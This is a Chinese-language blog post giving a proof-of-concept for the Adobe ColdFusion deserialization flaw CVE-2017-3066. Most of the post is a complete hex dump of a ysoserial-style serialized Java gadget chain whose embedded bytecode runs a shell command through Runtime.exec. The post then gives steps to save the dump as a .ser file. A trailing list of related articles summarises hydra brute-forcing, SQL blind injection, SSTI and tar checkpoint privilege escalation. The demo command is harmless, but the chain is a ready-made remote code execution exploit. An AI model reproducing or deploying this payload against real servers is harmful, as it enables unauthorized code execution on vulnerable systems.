POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

2023-11-20

安装010Editer

下载链接:http://www.pc6.com/softview/SoftView_55129.html

复制POC的十六进制

00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A
07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 69
73 32 2E 75 74 69 6C 2E 4D 65 74 61 44 61 74 61
45 6E 74 72 79 7C 99 8B D2 C6 4F B4 E3 00 00 00
02 01 00 00 00 0A E8 AC ED 00 05 73 72 00 17 6A
61 76 61 2E 75 74 69 6C 2E 50 72 69 6F 72 69 74
79 51 75 65 75 65 94 DA 30 B4 FB 3F 82 B1 03 00
02 49 00 04 73 69 7A 65 4C 00 0A 63 6F 6D 70 61
72 61 74 6F 72 74 00 16 4C 6A 61 76 61 2F 75 74
69 6C 2F 43 6F 6D 70 61 72 61 74 6F 72 3B 78 70
00 00 00 02 73 72 00 2B 6F 72 67 2E 61 70 61 63
68 65 2E 63 6F 6D 6D 6F 6E 73 2E 62 65 61 6E 75
74 69 6C 73 2E 42 65 61 6E 43 6F 6D 70 61 72 61
74 6F 72 CF 8E 01 82 FE 4E F1 7E 02 00 02 4C 00
0A 63 6F 6D 70 61 72 61 74 6F 72 71 00 7E 00 01
4C 00 08 70 72 6F 70 65 72 74 79 74 00 12 4C 6A
61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B
78 70 73 72 00 3F 6F 72 67 2E 61 70 61 63 68 65
2E 63 6F 6D 6D 6F 6E 73 2E 63 6F 6C 6C 65 63 74
69 6F 6E 73 2E 63 6F 6D 70 61 72 61 74 6F 72 73
2E 43 6F 6D 70 61 72 61 62 6C 65 43 6F 6D 70 61
72 61 74 6F 72 FB F4 99 25 B8 6E B1 37 02 00 00
78 70 74 00 10 6F 75 74 70 75 74 50 72 6F 70 65
72 74 69 65 73 77 04 00 00 00 03 73 72 00 3A 63
6F 6D 2E 73 75 6E 2E 6F 72 67 2E 61 70 61 63 68
65 2E 78 61 6C 61 6E 2E 69 6E 74 65 72 6E 61 6C
2E 78 73 6C 74 63 2E 74 72 61 78 2E 54 65 6D 70
6C 61 74 65 73 49 6D 70 6C 09 57 4F C1 6E AC AB
33 03 00 06 49 00 0D 5F 69 6E 64 65 6E 74 4E 75
6D 62 65 72 49 00 0E 5F 74 72 61 6E 73 6C 65 74
49 6E 64 65 78 5B 00 0A 5F 62 79 74 65 63 6F 64
65 73 74 00 03 5B 5B 42 5B 00 06 5F 63 6C 61 73
73 74 00 12 5B 4C 6A 61 76 61 2F 6C 61 6E 67 2F
43 6C 61 73 73 3B 4C 00 05 5F 6E 61 6D 65 71 00
7E 00 04 4C 00 11 5F 6F 75 74 70 75 74 50 72 6F
70 65 72 74 69 65 73 74 00 16 4C 6A 61 76 61 2F
75 74 69 6C 2F 50 72 6F 70 65 72 74 69 65 73 3B
78 70 00 00 00 00 FF FF FF FF 75 72 00 03 5B 5B
42 4B FD 19 15 67 67 DB 37 02 00 00 78 70 00 00
00 02 75 72 00 02 5B 42 AC F3 17 F8 06 08 54 E0
02 00 00 78 70 00 00 06 B5 CA FE BA BE 00 00 00
32 00 39 0A 00 03 00 22 07 00 37 07 00 25 07 00
26 01 00 10 73 65 72 69 61 6C 56 65 72 73 69 6F
6E 55 49 44 01 00 01 4A 01 00 0D 43 6F 6E 73 74
61 6E 74 56 61 6C 75 65 05 AD 20 93 F3 91 DD EF
3E 01 00 06 3C 69 6E 69 74 3E 01 00 03 28 29 56
01 00 04 43 6F 64 65 01 00 0F 4C 69 6E 65 4E 75
6D 62 65 72 54 61 62 6C 65 01 00 12 4C 6F 63 61
6C 56 61 72 69 61 62 6C 65 54 61 62 6C 65 01 00
04 74 68 69 73 01 00 13 53 74 75 62 54 72 61 6E
73 6C 65 74 50 61 79 6C 6F 61 64 01 00 0C 49 6E
6E 65 72 43 6C 61 73 73 65 73 01 00 35 4C 79 73
6F 73 65 72 69 61 6C 2F 70 61 79 6C 6F 61 64 73
2F 75 74 69 6C 2F 47 61 64 67 65 74 73 24 53 74
75 62 54 72 61 6E 73 6C 65 74 50 61 79 6C 6F 61
64 3B 01 00 09 74 72 61 6E 73 66 6F 72 6D 01 00
72 28 4C 63 6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61
70 61 63 68 65 2F 78 61 6C 61 6E 2F 69 6E 74 65
72 6E 61 6C 2F 78 73 6C 74 63 2F 44 4F 4D 3B 5B
4C 63 6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61 70 61
63 68 65 2F 78 6D 6C 2F 69 6E 74 65 72 6E 61 6C
2F 73 65 72 69 61 6C 69 7A 65 72 2F 53 65 72 69
61 6C 69 7A 61 74 69 6F 6E 48 61 6E 64 6C 65 72
3B 29 56 01 00 08 64 6F 63 75 6D 65 6E 74 01 00
2D 4C 63 6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61 70
61 63 68 65 2F 78 61 6C 61 6E 2F 69 6E 74 65 72
6E 61 6C 2F 78 73 6C 74 63 2F 44 4F 4D 3B 01 00
08 68 61 6E 64 6C 65 72 73 01 00 42 5B 4C 63 6F
6D 2F 73 75 6E 2F 6F 72 67 2F 61 70 61 63 68 65
2F 78 6D 6C 2F 69 6E 74 65 72 6E 61 6C 2F 73 65
72 69 61 6C 69 7A 65 72 2F 53 65 72 69 61 6C 69
7A 61 74 69 6F 6E 48 61 6E 64 6C 65 72 3B 01 00
0A 45 78 63 65 70 74 69 6F 6E 73 07 00 27 01 00
A6 28 4C 63 6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61
70 61 63 68 65 2F 78 61 6C 61 6E 2F 69 6E 74 65
72 6E 61 6C 2F 78 73 6C 74 63 2F 44 4F 4D 3B 4C
63 6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61 70 61 63
68 65 2F 78 6D 6C 2F 69 6E 74 65 72 6E 61 6C 2F
64 74 6D 2F 44 54 4D 41 78 69 73 49 74 65 72 61
74 6F 72 3B 4C 63 6F 6D 2F 73 75 6E 2F 6F 72 67
2F 61 70 61 63 68 65 2F 78 6D 6C 2F 69 6E 74 65
72 6E 61 6C 2F 73 65 72 69 61 6C 69 7A 65 72 2F
53 65 72 69 61 6C 69 7A 61 74 69 6F 6E 48 61 6E
64 6C 65 72 3B 29 56 01 00 08 69 74 65 72 61 74
6F 72 01 00 35 4C 63 6F 6D 2F 73 75 6E 2F 6F 72
67 2F 61 70 61 63 68 65 2F 78 6D 6C 2F 69 6E 74
65 72 6E 61 6C 2F 64 74 6D 2F 44 54 4D 41 78 69
73 49 74 65 72 61 74 6F 72 3B 01 00 07 68 61 6E
64 6C 65 72 01 00 41 4C 63 6F 6D 2F 73 75 6E 2F
6F 72 67 2F 61 70 61 63 68 65 2F 78 6D 6C 2F 69
6E 74 65 72 6E 61 6C 2F 73 65 72 69 61 6C 69 7A
65 72 2F 53 65 72 69 61 6C 69 7A 61 74 69 6F 6E
48 61 6E 64 6C 65 72 3B 01 00 0A 53 6F 75 72 63
65 46 69 6C 65 01 00 0C 47 61 64 67 65 74 73 2E
6A 61 76 61 0C 00 0A 00 0B 07 00 28 01 00 33 79
73 6F 73 65 72 69 61 6C 2F 70 61 79 6C 6F 61 64
73 2F 75 74 69 6C 2F 47 61 64 67 65 74 73 24 53
74 75 62 54 72 61 6E 73 6C 65 74 50 61 79 6C 6F
61 64 01 00 40 63 6F 6D 2F 73 75 6E 2F 6F 72 67
2F 61 70 61 63 68 65 2F 78 61 6C 61 6E 2F 69 6E
74 65 72 6E 61 6C 2F 78 73 6C 74 63 2F 72 75 6E
74 69 6D 65 2F 41 62 73 74 72 61 63 74 54 72 61
6E 73 6C 65 74 01 00 14 6A 61 76 61 2F 69 6F 2F
53 65 72 69 61 6C 69 7A 61 62 6C 65 01 00 39 63
6F 6D 2F 73 75 6E 2F 6F 72 67 2F 61 70 61 63 68
65 2F 78 61 6C 61 6E 2F 69 6E 74 65 72 6E 61 6C
2F 78 73 6C 74 63 2F 54 72 61 6E 73 6C 65 74 45
78 63 65 70 74 69 6F 6E 01 00 1F 79 73 6F 73 65
72 69 61 6C 2F 70 61 79 6C 6F 61 64 73 2F 75 74
69 6C 2F 47 61 64 67 65 74 73 01 00 08 3C 63 6C
69 6E 69 74 3E 01 00 11 6A 61 76 61 2F 6C 61 6E
67 2F 52 75 6E 74 69 6D 65 07 00 2A 01 00 0A 67
65 74 52 75 6E 74 69 6D 65 01 00 15 28 29 4C 6A
61 76 61 2F 6C 61 6E 67 2F 52 75 6E 74 69 6D 65
3B 0C 00 2C 00 2D 0A 00 2B 00 2E 01 00 23 74 6F
75 63 68 20 2F 74 6D 70 2F 43 56 45 2D 32 30 31
37 2D 33 30 36 36 5F 69 73 5F 73 75 63 63 65 73
73 08 00 30 01 00 04 65 78 65 63 01 00 27 28 4C
6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67
3B 29 4C 6A 61 76 61 2F 6C 61 6E 67 2F 50 72 6F
63 65 73 73 3B 0C 00 32 00 33 0A 00 2B 00 34 01
00 0D 53 74 61 63 6B 4D 61 70 54 61 62 6C 65 01
00 1C 79 73 6F 73 65 72 69 61 6C 2F 50 77 6E 65
72 31 37 31 34 30 33 36 31 37 38 30 35 32 01 00
1E 4C 79 73 6F 73 65 72 69 61 6C 2F 50 77 6E 65
72 31 37 31 34 30 33 36 31 37 38 30 35 32 3B 00
21 00 02 00 03 00 01 00 04 00 01 00 1A 00 05 00
06 00 01 00 07 00 00 00 02 00 08 00 04 00 01 00
0A 00 0B 00 01 00 0C 00 00 00 2F 00 01 00 01 00
00 00 05 2A B7 00 01 B1 00 00 00 02 00 0D 00 00
00 06 00 01 00 00 00 2F 00 0E 00 00 00 0C 00 01
00 00 00 05 00 0F 00 38 00 00 00 01 00 13 00 14
00 02 00 0C 00 00 00 3F 00 00 00 03 00 00 00 01
B1 00 00 00 02 00 0D 00 00 00 06 00 01 00 00 00
34 00 0E 00 00 00 20 00 03 00 00 00 01 00 0F 00
38 00 00 00 00 00 01 00 15 00 16 00 01 00 00 00
01 00 17 00 18 00 02 00 19 00 00 00 04 00 01 00
1A 00 01 00 13 00 1B 00 02 00 0C 00 00 00 49 00
00 00 04 00 00 00 01 B1 00 00 00 02 00 0D 00 00
00 06 00 01 00 00 00 38 00 0E 00 00 00 2A 00 04
00 00 00 01 00 0F 00 38 00 00 00 00 00 01 00 15
00 16 00 01 00 00 00 01 00 1C 00 1D 00 02 00 00
00 01 00 1E 00 1F 00 03 00 19 00 00 00 04 00 01
00 1A 00 08 00 29 00 0B 00 01 00 0C 00 00 00 24
00 03 00 02 00 00 00 0F A7 00 03 01 4C B8 00 2F
12 31 B6 00 35 57 B1 00 00 00 01 00 36 00 00 00
03 00 01 03 00 02 00 20 00 00 00 02 00 21 00 11
00 00 00 0A 00 01 00 02 00 23 00 10 00 09 75 71
00 7E 00 10 00 00 01 D4 CA FE BA BE 00 00 00 32
00 1B 0A 00 03 00 15 07 00 17 07 00 18 07 00 19
01 00 10 73 65 72 69 61 6C 56 65 72 73 69 6F 6E
55 49 44 01 00 01 4A 01 00 0D 43 6F 6E 73 74 61
6E 74 56 61 6C 75 65 05 71 E6 69 EE 3C 6D 47 18
01 00 06 3C 69 6E 69 74 3E 01 00 03 28 29 56 01
00 04 43 6F 64 65 01 00 0F 4C 69 6E 65 4E 75 6D
62 65 72 54 61 62 6C 65 01 00 12 4C 6F 63 61 6C
56 61 72 69 61 62 6C 65 54 61 62 6C 65 01 00 04
74 68 69 73 01 00 03 46 6F 6F 01 00 0C 49 6E 6E
65 72 43 6C 61 73 73 65 73 01 00 25 4C 79 73 6F
73 65 72 69 61 6C 2F 70 61 79 6C 6F 61 64 73 2F
75 74 69 6C 2F 47 61 64 67 65 74 73 24 46 6F 6F
3B 01 00 0A 53 6F 75 72 63 65 46 69 6C 65 01 00
0C 47 61 64 67 65 74 73 2E 6A 61 76 61 0C 00 0A
00 0B 07 00 1A 01 00 23 79 73 6F 73 65 72 69 61
6C 2F 70 61 79 6C 6F 61 64 73 2F 75 74 69 6C 2F
47 61 64 67 65 74 73 24 46 6F 6F 01 00 10 6A 61
76 61 2F 6C 61 6E 67 2F 4F 62 6A 65 63 74 01 00
14 6A 61 76 61 2F 69 6F 2F 53 65 72 69 61 6C 69
7A 61 62 6C 65 01 00 1F 79 73 6F 73 65 72 69 61
6C 2F 70 61 79 6C 6F 61 64 73 2F 75 74 69 6C 2F
47 61 64 67 65 74 73 00 21 00 02 00 03 00 01 00
04 00 01 00 1A 00 05 00 06 00 01 00 07 00 00 00
02 00 08 00 01 00 01 00 0A 00 0B 00 01 00 0C 00
00 00 2F 00 01 00 01 00 00 00 05 2A B7 00 01 B1
00 00 00 02 00 0D 00 00 00 06 00 01 00 00 00 3C
00 0E 00 00 00 0C 00 01 00 00 00 05 00 0F 00 12
00 00 00 02 00 13 00 00 00 02 00 14 00 11 00 00
00 0A 00 01 00 02 00 16 00 10 00 09 70 74 00 04
50 77 6E 72 70 77 01 00 78 71 00 7E 00 0D 78 01
01 01

新建十六进制文件

注意粘贴为十六进制格式(或者Ctrl+Shift+V)
在这里插入图片描述
粘贴效果应该是这样的:
在这里插入图片描述
粘贴没问题后保存文件,记得文件名修改为.ser
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066) 的相关文章

  • POC测试是什么

    POC测试 xff0c 即Proof of Concept 可以理解为 xff1a 根据客户需求进行测试 是业界流行的针对客户具体应用的验证性测试 xff0c 根据用户对采用系统提出的性能要求和扩展需求的指标 xff0c 在选用服务器上进行
  • Frp某场景下实现多层代理

    注 由于传播 利用本文章所提供的信息而造成的任何直接或者间接的后果及损失 均由使用者本人负责 本文作者不为此承担任何责任 一旦造成后果请自行承担 目录 frp简介 部分配置参数说明 实验场景 实验场景 实验环境 实验步骤 第一层隧道 第二层
  • ssh渗透与hydra爆破(简明不啰嗦)

    适合新手上路 MSF与hydra两种方式渗透22端口 后进行远程连接 如有不足请各位见谅 此次实验仅供参考 切勿做违法犯罪 出事一切与本人无关后果自负 希望大家早日成为白帽子 渗透机 kali 靶机 192 168 75 128 1 扫描局
  • hydra详细介绍及渗透利用大全(超细)

    hydra小白渗透路上必须掌握的工具 历史我就不介绍了百度上更详细 本内容仅供参考 切勿做违法犯罪 若出事一切与本人无关 请大家遵守网络安全法 祝大家早日成为安全界的大佬 Hydra 参数介绍 R 根据上一次进度继续破解 S 使用SSL协议
  • 利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞

    Discuz X 3 4 任意文件删除漏洞 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 Formhash Cookie 发送数据包 原文 Vulnhub官方复现教程 https vulhub org environm
  • 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    JBoss 4 x JBossMQ JMS 反序列化漏洞 CVE 2017 7504 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 发送POC 通过命令 通过 BurpSuit 发送 检测POC是否成功 Vulnhub
  • SQL布尔盲注

    SQL布尔盲注 常用函数 注入步骤 1 爆数据库名称长度 2 爆库名 3 确定当前库中表的个数 4 爆表名长度 5 爆表名 6 爆表项个数 7 爆表项长度 8 爆表项 9 爆数据 常用函数 substr str from length 返回
  • Kioptrix Level 2-writeup

    Kioptrix Level 2 writeup 0x00 信息收集 目标机器 16 16 16 178 kali攻击机 16 16 16 177 使用nmap来个端口服务扫描 浏览器打开http 16 16 16 178看看 第一眼看上去
  • 利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

    Apache Log4j Server 反序列化命令执行漏洞 CVE 2017 5645 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 payload 检测 Vulnhub官方复现教程 https vulhub org
  • SSTI模板注入

    SSTI模板注入 探测 识别 利用 Smarty Twig 1 x twig2 x 3 x jinja2 探测 使用
  • 内网渗透-代理篇(reGeorg+Proxifier代理工具)

    声明 贝塔安全实验室公众号大部分文章来自团队核心成员和知识星球成员 少部分文章经过原作者授权和其它公众号白名单转载 未经授权 严禁转载 如需转载 请联系开白 请勿利用文章内的相关技术从事非法测试 如因此产生的一切不良后果与文章作者及本公众号
  • 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

    mini httpd任意文件读取漏洞 CVE 2018 18778 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 漏洞复现 Vulnhub官方复现教程 https vulhub org
  • Kioptrix_Level_1-writeup

    Kioptrix Level 1 writeup 0x00 信息收集 目标机器IP 16 16 16 176 kali攻击机 16 16 16 177 nmap扫描端口服务 nmap A Pn 16 16 16 176 Starting N
  • kali linux配置网络代理

    一 命令行终端 1 进入 etc profile d目录 新建文件proxy sh 内容如下 kali kali etc profile d cat proxy sh export proxy http 192 168 150 1 7890
  • 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

    Imagetragick 命令执行漏洞 CVE 2016 3714 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 上传POC 反弹shell POC Vulnhub官方复现教
  • sqli-less-26-less26a

    less 26 单引号 GET型 这关就有点过滤的意思了 过滤了上一关的东西 并且把空格和 23给过滤了 如果是ubuntu的话 可以用 0a等绕过 方便一些 但我的是windows 所以就只能用 了 让后使用 来代替and 用 1来闭合
  • 使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用

    如果管理员给予了某个普通用户tar命令的超级管理员操作 那么我们可以使用tar命令进行提权 命令如下 sudo u root tar cf dev null exploit checkpoint 1 checkpoint action ex
  • 红日安全靶机实战(一)

    0x01 入侵web服务器 0x 1 1 信息收集 首先使用 nmap 来扫描ip 段存活的主机 nmap sn 192 168 127 0 24 这里网上有的用 netdiscover 来扫描 其实和 nmap sn 扫描原理是一样的 都
  • 史上最强内网渗透知识点总结

    https mp weixin qq com s biz MzI5MDQ2NjExOQ mid 2247487491 idx 1 sn 270336c6cca79b4a4e5d777d41ce71b7 chksm ec1e202bdb69a
  • [渗透]CVE-2020-1938/CNVD-2020-10487:Apache Tomcat AJP连接器远程执行代码漏洞

    受影响版本 Apache Tomcat 6 Apache Tomcat 7x lt 7 0 100 Apache Tomcat 8x lt 8 5 51 Apache Tomcat 9x lt 9 0 31 未受影响版本 Tomcat 7

随机推荐